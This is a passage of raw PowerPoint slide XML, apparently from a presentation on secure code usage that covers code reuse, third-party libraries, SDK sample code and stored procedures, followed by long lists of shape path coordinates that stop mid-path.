                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Management</a:t>
            </a:r>
            <a:endParaRPr sz="2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7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Uses</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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unsecure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functions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37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Checks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input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validation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overflow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protection.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50584" y="306451"/>
            <a:ext cx="3354704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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-7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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Code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E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Usage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36920" y="760476"/>
            <a:ext cx="460857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445634" y="1933193"/>
            <a:ext cx="7623809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pro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gram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existin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cod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followi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7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way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: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36801" y="3018281"/>
            <a:ext cx="4463415" cy="13652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">
              <a:lnSpc>
                <a:spcPts val="2635"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-20" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-75" b="1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2200" spc="45" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>reuse</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="12700" marR="5080" indent="635">
              <a:lnSpc>
                <a:spcPts val="2640"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="85"/>
              </a:spcBef>
            </a:pP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Us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ng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block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cod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fr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m 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elsew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sam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appl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cati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n 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3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another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application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86027" y="6157086"/>
            <a:ext cx="4577715" cy="10325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065" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="90"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="65" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Third-party </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="55" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>libraries </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="75" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-80" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DLLs </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-75" b="1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Monitor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shared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libraries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known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vulnerabilities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patches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28807" y="5809615"/>
            <a:ext cx="4502150" cy="13652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99900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="70" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Software</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30" b="1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2200" spc="80" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Development</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-15" b="1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2200" spc="45" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Kit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50" b="1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2200" spc="-70" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(SDK) </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-595" b="1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Using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sample code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libraries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pre</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-570">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-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bu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lt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fu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ction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fr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m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 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programming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environment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755883" y="3042666"/>
            <a:ext cx="3670300" cy="1031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542290">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="35" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="40" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>procedures </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="45" b="1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Us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ng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pr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570">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-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bu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lt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fu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ctio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to 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perform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database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query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249923" y="3517391"/>
            <a:ext cx="4215765" cy="3221990"/>
            <a:chOff x="6249923" y="3517391"/>
            <a:chExt cx="4215765" cy="3221990"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6969251" y="3680967"/>
              <a:ext cx="2816860" cy="2806700"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2816859" h="2806700">
                  <a:moveTo>
                    <a:pt x="1599451" y="2793999"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1216900" y="2793999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1264046" y="2806699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1552305" y="2806699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1599451" y="2793999"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2816859" h="2806700">
                  <a:moveTo>
                    <a:pt x="1737826" y="2768599"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1078525" y="2768599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170248" y="2793999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1646103" y="2793999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1737826" y="2768599"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2816859" h="2806700">
                  <a:moveTo>
                    <a:pt x="1646103" y="12700"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1170248" y="12700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033506" y="50800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859661" y="101600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="817887" y="127000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776840" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736546" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697032" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="658323" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620445" y="241300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583425" y="266700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547289" y="292100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512062" y="317500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477770" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444441" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412099" y="406400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380771" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350482" y="469900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321260" y="508000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293130" y="546100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266118" y="584200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240251" y="622300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215553" y="660400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192052" y="698500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169773" y="736600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148742" y="774700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128987" y="812800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110531" y="850900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93402" y="901700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77626" y="939800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63229" y="990600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50237" y="1028700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38675" y="1079500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28571" y="1117600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19949" y="1168400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12837" y="1219200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7260" y="1257300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3244" y="1308100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815" y="1358900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1409700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="815" y="1447800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3244" y="1498600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7260" y="1549400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12837" y="1600200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19949" y="1638300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28571" y="1689100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38675" y="1739900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50237" y="1778000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63229" y="1828800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77626" y="1866900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93402" y="1905000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110531" y="1955800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128987" y="1993900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148742" y="2032000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169773" y="2082800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192052" y="2120900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215553" y="2159000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240251" y="2197100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266118" y="2235199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293130" y="2260599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321260" y="2298699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="350482" y="2336799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380771" y="2374899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="412099" y="2400299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="444441" y="2438399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477770" y="2463799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512062" y="2489199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="547289" y="2514599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583425" y="2552699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620445" y="2578099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="658323" y="2603499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697032" y="2616199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="736546" y="2641599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="776840" y="2666999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="817887" y="2679699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859661" y="2705099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945285" y="2730499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="989084" y="2755899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1033506" y="2768599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1782845" y="2768599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827267" y="2755899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1871066" y="2730499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1956690" y="2705099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1998464" y="2679699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2039511" y="2666999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2079805" y="2641599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1311468" y="2641599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1263856" y="2628899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1216784" y="2628899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1170288" y="2616199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124400" y="2616199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1034592" y="2590799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="990740" y="2565399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905314" y="2539999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="863809" y="2514599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="823155" y="2501899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="783387" y="2476499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="744540" y="2451099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706647" y="2425699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669744" y="2400299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="633865" y="2374899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599044" y="2336799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565317" y="2311399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532717" y="2285999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501279" y="2247899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471039" y="2209800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442029" y="2184400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414286" y="2146300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="387842" y="2108200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362734" y="2070100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338995" y="2032000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316661" y="1993900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295765" y="1943100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276342" y="1905000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258427" y="1866900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242054" y="1816100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227258" y="1778000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214073" y="1739900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202534" y="1689100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192675" y="1638300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184532" y="1600200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178138" y="1549400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173528" y="1498600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170737" y="1447800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169799" y="1409700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170737" y="1358900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173528" y="1308100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178138" y="1257300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184532" y="1219200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192675" y="1168400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202534" y="1117600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214073" y="1079500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227258" y="1028700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242054" y="990600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258427" y="939800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276342" y="901700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295765" y="863600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316661" y="825500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338995" y="774700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362734" y="736600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="387842" y="698500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="414286" y="660400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442029" y="635000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="471039" y="596900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="501279" y="558800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532717" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="565317" y="495300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599044" y="469900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="633865" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="669744" y="406400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="706647" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="744540" y="355600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="783387" y="330200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="823155" y="317500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="863809" y="292100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905314" y="266700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1079157" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1216784" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1263856" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1311468" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2079805" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2039511" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1998464" y="127000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1956690" y="101600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1782845" y="50800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1646103" y="12700"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2816859" h="2806700">
                  <a:moveTo>
                    <a:pt x="2079805" y="165100"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1504883" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1552495" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1599567" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1737194" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911037" y="266700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952542" y="292100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1993196" y="317500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032964" y="330200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071811" y="355600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2109704" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2146607" y="406400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2182486" y="444500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2217307" y="469900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2251034" y="495300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2283634" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2315072" y="558800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2345312" y="596900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2374322" y="635000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2402065" y="660400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2428509" y="698500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2453617" y="736600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2477356" y="774700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2499690" y="825500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2520586" y="863600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2540009" y="901700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2557924" y="939800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2574297" y="990600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2589093" y="1028700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2602278" y="1079500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2613817" y="1117600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2623676" y="1168400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2631819" y="1219200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2638213" y="1257300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2642823" y="1308100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2645614" y="1358900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2646553" y="1409700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2645614" y="1447800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2642823" y="1498600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2638213" y="1549400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2631819" y="1600200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2623676" y="1638300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2613817" y="1689100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2602278" y="1739900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2589093" y="1778000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2574297" y="1816100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2557924" y="1866900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2540009" y="1905000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2520586" y="1943100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2499690" y="1993900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2477356" y="2032000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2453617" y="2070100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2428509" y="2108200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2402065" y="2146300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2374322" y="2184400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2345312" y="2209800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2315072" y="2247899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2283634" y="2285999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2251034" y="2311399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2217307" y="2336799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2182486" y="2374899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2146607" y="2400299"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2109704" y="2425699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2071811" y="2451099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2032964" y="2476499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1993196" y="2501899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1952542" y="2514599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911037" y="2539999"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1825611" y="2565399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1781759" y="2590799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1691951" y="2616199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1646063" y="2616199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1599567" y="2628899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1552495" y="2628899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1504883" y="2641599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2079805" y="2641599"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2119319" y="2616199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2158028" y="2603499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2195906" y="2578099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2232926" y="2552699"/>
